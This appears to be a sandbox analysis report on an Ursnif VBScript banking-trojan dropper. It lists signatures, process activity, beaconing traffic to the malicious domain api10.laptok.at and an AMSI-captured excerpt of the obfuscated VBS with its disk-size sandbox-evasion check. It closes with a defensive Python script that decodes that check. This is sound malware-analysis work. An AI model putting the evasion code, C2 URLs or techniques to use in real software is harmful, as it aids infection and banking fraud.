Analysis Report 6L4MCnj8FDjS.vbs

Overview

General Information

Sample Name: 6L4MCnj8FDjS.vbs
Analysis ID: 287399
MD5: 7f3ef738c67a95601faf316dd0a44c34
SHA1: dbe278e8e243215d3409504dcb25edee29ab7b03
SHA256: 89c1b7218c1437d3b79c0a5041b5a322f7f99d799a79f831b05be079514b30a0

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Startup

  • System is w10x64
  • wscript.exe (PID: 6772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6L4MCnj8FDjS.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6352 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 7140 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2916 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5356 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4588 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5384 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaI | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaIyslM2_2Buzc1k6G7VY/ipGWNgJ1iOzkI9jJ/W9bFQWX8mJlKvKU/YPVPrUi1v_2BSPmekN/DPravyq53/zGB48NmfTYdqwhlvVDum/WyaqhtLwUF6nHDhqqaV/gwV7eJKcyGueohzD2TrOre/AmHBe6morm7XC/cwN8rZWL/BAMdIAgSb5ZWH2X2l5K3Y_2/Fy_2FaAEXW/uN_0A_0D2Cm0ZfqY1/edgrHFWkJp9A/VZxQEuO1c0t/A4yxgPby/8AF3VLl | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPAXGfuZ8f_2/Fc6DDQ0RAJXa4AXyvl/0V9_2FTxD/LBZv8hi5gnZ7xJjS6O02/qdV7te7yaNZoP1tJE1p/_2Be_2BZ_2BOXsyj_2Fgs_/2BoBTmzGfFew_/2Bw_2FwV/u353AqSocJoRCPZ81JYbTSX/2W96c_2FMp/rXN9sT1sQwm_2FV2g/QdSnadTXcQIN/FkeK_2FwYQK/7ENRLQm0jwKc5O/xsyDbUv_0A_0DHmE82WxU/ZWyoJ6TmwmIzZaqf/Bo7lN13WMWCZb2b/_2FhS67Ya9GTsyYBVB/UKvQpyzs4/mSrt | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigOBQTnrJ/9Wj00KrBGb5aqns/Xk7kQDf6GG_2FmBWmq/P3WYwAOgj/PUoZKORvMVOVlj1SyeB_/2FwkpVFNSPzaxULycOr/re9pOZK1lrj0y_2FoOKEs2/9t6nr44SQ25ZY/580PzOev/t2b905CWWJcgFADquTHiEEf/pLELIfg9Tl/ACVucyQ1yNcu3Lvxx/GmA9DD1PyhMD/56ailR_0A_0/Do70pdrqjVKKvQ/t4PdKvT2MASn4v8Gaicve/fInINUnSWWIyt_2F/g4053j_2FsI/GNjlpcc8/S6z | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPA | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PV | Avira URL Cloud: Label: malware
Source: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigO | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\paymaster.cpp | Avira: detection malicious, Label: TR/AD.UrsnifDropper.fsmec
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | VirusTotal: Detection: 7%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | IP Address: 8.208.101.13
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected:
  GET /api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PVFpUZu/GnE4iSmDYSPRq_/2Ft8AT0ctTTBVw5oDC0f5/IwAakeBFEUQYGL7u/5orHs1NDoFNIEd7/hcd1srK7DDQNg575B5/_2F9TN9Gk/BxlSJeLIAvwu3S6bGnHO/7ypcNgGti9smR_2FoOY/drkATeGh_2FwBhjOkuD6ZS/p_2Fmf4mb_2Fq/TmrZF7lS/CkN6rgnXPXIemBtjrV9phKs/0_0A_0D3Gd/_2F7iMH5jluApUpBX/9aNILu2X3Jng/ruTDGgU_2F6HT2Dj/sGT HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigOBQTnrJ/9Wj00KrBGb5aqns/Xk7kQDf6GG_2FmBWmq/P3WYwAOgj/PUoZKORvMVOVlj1SyeB_/2FwkpVFNSPzaxULycOr/re9pOZK1lrj0y_2FoOKEs2/9t6nr44SQ25ZY/580PzOev/t2b905CWWJcgFADquTHiEEf/pLELIfg9Tl/ACVucyQ1yNcu3Lvxx/GmA9DD1PyhMD/56ailR_0A_0/Do70pdrqjVKKvQ/t4PdKvT2MASn4v8Gaicve/fInINUnSWWIyt_2F/g4053j_2FsI/GNjlpcc8/S6z HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaIyslM2_2Buzc1k6G7VY/ipGWNgJ1iOzkI9jJ/W9bFQWX8mJlKvKU/YPVPrUi1v_2BSPmekN/DPravyq53/zGB48NmfTYdqwhlvVDum/WyaqhtLwUF6nHDhqqaV/gwV7eJKcyGueohzD2TrOre/AmHBe6morm7XC/cwN8rZWL/BAMdIAgSb5ZWH2X2l5K3Y_2/Fy_2FaAEXW/uN_0A_0D2Cm0ZfqY1/edgrHFWkJp9A/VZxQEuO1c0t/A4yxgPby/8AF3VLl HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPAXGfuZ8f_2/Fc6DDQ0RAJXa4AXyvl/0V9_2FTxD/LBZv8hi5gnZ7xJjS6O02/qdV7te7yaNZoP1tJE1p/_2Be_2BZ_2BOXsyj_2Fgs_/2BoBTmzGfFew_/2Bw_2FwV/u353AqSocJoRCPZ81JYbTSX/2W96c_2FMp/rXN9sT1sQwm_2FV2g/QdSnadTXcQIN/FkeK_2FwYQK/7ENRLQm0jwKc5O/xsyDbUv_0A_0DHmE82WxU/ZWyoJ6TmwmIzZaqf/Bo7lN13WMWCZb2b/_2FhS67Ya9GTsyYBVB/UKvQpyzs4/mSrt HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: msapplication.xml1.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x94456d10,0x01d68e06</date><accdate>0x94456d10,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x94456d10,0x01d68e06</date><accdate>0x94456d10,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x944c93c1,0x01d68e06</date><accdate>0x944c93c1,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x944c93c1,0x01d68e06</date><accdate>0x944c93c1,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x944ef6c9,0x01d68e06</date><accdate>0x944ef6c9,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x944ef6c9,0x01d68e06</date><accdate>0x944ef6c9,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected (one 0x6a-byte chunk carrying a gzip member whose trailer gives an uncompressed length of 146 bytes, the size of nginx's stock 404 page):
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 18 Sep 2020 12:56:06 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {F4AE4B93-F9F9-11EA-90E8-ECF4BBEA1588}.dat.30.dr, ~DF691B3118D98C0EDE.TMP.30.dr | String found in binary or memory: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPA
Source: {BE54E3EE-F9F9-11EA-90E8-ECF4BBEA1588}.dat.20.dr | String found in binary or memory: http://api10.laptok.at/api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PV
Source: {D8B744D5-F9F9-11EA-90E8-ECF4BBEA1588}.dat.24.dr | String found in binary or memory: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigO
Source: {E68701EF-F9F9-11EA-90E8-ECF4BBEA1588}.dat.27.dr | String found in binary or memory: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaI
Source: msapplication.xml.20.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.20.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.20.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.20.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.20.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.20.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.20.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.20.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: the eight process-5 memory dumps (0000000005B38000 region) listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above, type: MEMORY
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\paymaster.cpp (SHA256 171E91073EF3BC55FDC90780A351918FA99E04BE5043DBD4AE1ED220C6631F8C)
Source: 6L4MCnj8FDjS.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.evad.winVBS@13/70@4/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6L4MCnj8FDjS.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript scripting engine CLSID)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: 6L4MCnj8FDjS.vbs | Static file information: File size 1155568 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\69\Shell\85\32\And\half\57\22\80\Neck\62\15\connect.pdb | source: wscript.exe, 00000002.00000003.214035260.0000029CC1ABC000.00000004.00000001.sdmp, paymaster.cpp.2.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface (script text as handed to AMSI; the capture starts mid-expression, the REM and ' lines are dictionary-word padding, and the constant arithmetic folds to a divisor of 1073741824 (1 GiB) and a threshold of 60, so the routine bails out through SZMYf when the summed Win32_LogicalDisk sizes come to less than 60 GiB):
  WScript.ScriptName, cStr(351851199)) > 0 And aggregate963 = 0) Then
  REM Griswold peon radian episcopal intermittent kindle circumsphere lineman blazon tarpaper laud inshore nominee servant galvanism footprint bam treetop huff sealant. 4005885 regretful dowel810 emerge Brownian sell vitreous grottoes slit plasma Malcolm circumcision amalgamate decontrolling. torture. sandpiper chairwoman283 oscillate Rwanda, 4724005 showcase Whelan Elsevier489 arborescent booth explode despise typewritten86 Harriman agnomen toothpick573 dormitory
  Exit Function
  End If
  REM wand toddy Oldsmobile chromatography Smucker anomie ruinous116. 9686269 franchise. Uganda Pygmalion Ackley Maharashtra oath kelly banter, denudation Miles Gerry delightful game quaternary Jon469 gig plywood Dudley retaliate perversion Aesop Maier753 tuberculin Clayton Fortescue135, Essex hinterland Nairobi Mafia dragging pendulum850 drugstore institution279 Trichinella chlorate poetry53 Sidney Lakehurst shabby. commissary backlog cosmology UN idiotic inaccuracy Lucia334 compliant. theology morn, confirmation abbey Odin pushover ovulate convolution instrument Loire relish Saunders
  Set nation = GetObject("winmgmts:\\.\root\cimv2")
  Set kzpmSExK = nation.ExecQuery("Select * from Win32_LogicalDisk")
  For Each wXgOzgz In kzpmSExK
  Nicosia = Nicosia + Int(wXgOzgz.Size / ((68 + (69 + (1073741819 - 119.0))) - 13.0))
  ' Brahmsian furnish64, Evanston760 adject Aztec389 trite obstruct Cyclades split stowage Brumidi Spencerian songful firmware meson walk pursue576 period ontogeny footman leaky intimidate declination appeasable mania bloom sprung stub bauble aghast barrow, childbirth Oregon Bolivia madam appraise, Daniel NASA Orwellian web introspect recalcitrant, highball516 than846 candy shadow Capetown lumpish aggressive816 Chester inoperative em influent nucleotide613 sallow piddle vendible Viet programmer virtuosity radiography852 irredentism skyline Shakespearean deer, 5502771 chance Sanchez629 dominant freehold Neumann vest dignitary route era bookend elastic influential boatyard posable nought typhoid423 detector. inverse322 manioc leonine squander flexible Cummings Avis gravitometer keelson territorial
  Next
  REM secondhand analgesic laughingstock973 Fitchburg incidental aurora dietician haiku Dylan hieroglyphic Midwestern, twirly odometer taxpaying protease western perturb lawman708 Arden canny stilt exploitation ls confrontation imprint bacteria monsoon Lomb unruly infrequent Midas323 run wharf myth stumble amoral inhale aphid everyman
  If Nicosia < (1453 - ((2122 - (84 + 643.0)) - 2.0)) Then
  SZMYf
  End If
  REM jolly, rustle apprehension shad peninsular radiology Noel flake Adlerian bye Peterson. auk debarring sac Nietzsche Hubert morgen yell. militarism, thunderstorm priggish testify dubious, xylene invaluable weaken turtleback three childish Australia bezel daze26 Antilles762 bacterial Erlenmeyer
  End Function
  Function NbIrDNan()
  on error resume next
  REM bitwise acceptor Camino. launch cornfield phone275. medicinal,
Source: initial sample | Static PE information: section name: .text entropy: 6.8218736082
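Folding the constant arithmetic in the AMSI-captured snippet is the quickest way to see what the WMI disk enumeration is really for. The Python below is an added example, not code from the report or from the sample: it evaluates only numeric + - * / expressions through the ast module (never eval on malware text), pulls out the WQL query, and recovers the divisor 1073741824 (1 GiB) and the threshold 60, which means the function exits through SZMYf whenever the summed size of all logical disks is under 60 GiB, a standard small-disk sandbox check. The embedded excerpt is the captured script from the report with the comment padding removed; the function names are mine.

```python
"""Recover the sandbox-evasion threshold hidden behind constant arithmetic in
the Ursnif VBS dropper's AMSI-captured code. Added example, not code from the report."""
import ast
import operator
import re

# Excerpt of the VBScript that AMSI handed to the sandbox (copied from the report;
# the dictionary-word REM/' padding has been removed, nothing else changed).
VBS_EXCERPT = r'''
Set nation = GetObject("winmgmts:\\.\root\cimv2")
Set kzpmSExK = nation.ExecQuery("Select * from Win32_LogicalDisk")
For Each wXgOzgz In kzpmSExK
Nicosia = Nicosia + Int(wXgOzgz.Size / ((68 + (69 + (1073741819 - 119.0))) - 13.0))
Next
If Nicosia < (1453 - ((2122 - (84 + 643.0)) - 2.0)) Then
SZMYf
End If
'''

_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
            ast.Mult: operator.mul, ast.Div: operator.truediv}


def fold_constants(expr):
    """Evaluate a purely numeric arithmetic expression (+ - * / and parentheses).

    VBScript's / is floating-point division like Python's, so Python's parser is
    reused; any node that is not a number or one of those operators raises, so
    no script-controlled code can run."""
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -ev(node.operand)
        raise ValueError("unsupported syntax: %s" % type(node).__name__)
    return ev(ast.parse(expr, mode="eval"))


def _paren_group(text, start):
    """Return the parenthesised group that opens at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    raise ValueError("unbalanced parentheses")


def extract_wmi_queries(vbs):
    """WQL strings passed to ExecQuery, e.g. the Win32_LogicalDisk enumeration."""
    return re.findall(r'\.ExecQuery\("([^"]+)"\)', vbs, flags=re.IGNORECASE)


def recover_disk_check(vbs):
    """Locate the Size / <expr> divisor and the If <var> < <expr> threshold,
    fold both, and report what the comparison means."""
    div_m = re.search(r"\.Size\s*/\s*\(", vbs, flags=re.IGNORECASE)
    divisor = fold_constants(_paren_group(vbs, div_m.end() - 1))
    if_m = re.search(r"\bIf\s+(\w+)\s*<\s*\(", vbs, flags=re.IGNORECASE)
    threshold = fold_constants(_paren_group(vbs, if_m.end() - 1))
    # The statement executed when the disk total is too small (the exit routine).
    then_m = re.search(r"\bThen\s+(\w+)", vbs[if_m.end():])
    unit = {2 ** 30: "GiB", 2 ** 20: "MiB"}.get(int(divisor), "units of %d bytes" % divisor)
    on_fail = then_m.group(1) if then_m else "?"
    return {
        "wmi_queries": extract_wmi_queries(vbs),
        "divisor": int(divisor),
        "threshold": int(threshold),
        "on_fail_call": then_m.group(1) if then_m else None,
        "summary": "abort via %s when total logical-disk size < %d %s"
                   % (on_fail, int(threshold), unit),
    }


if __name__ == "__main__":
    for key, value in recover_disk_check(VBS_EXCERPT).items():
        print("%-13s %s" % (key, value))
```

The same folder works on the other arithmetic-wrapped constants the obfuscator emits; a check like this belongs in triage tooling because a threshold of 60 GiB tells the analyst straight away why the payload stage may never run on a default sandbox image.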

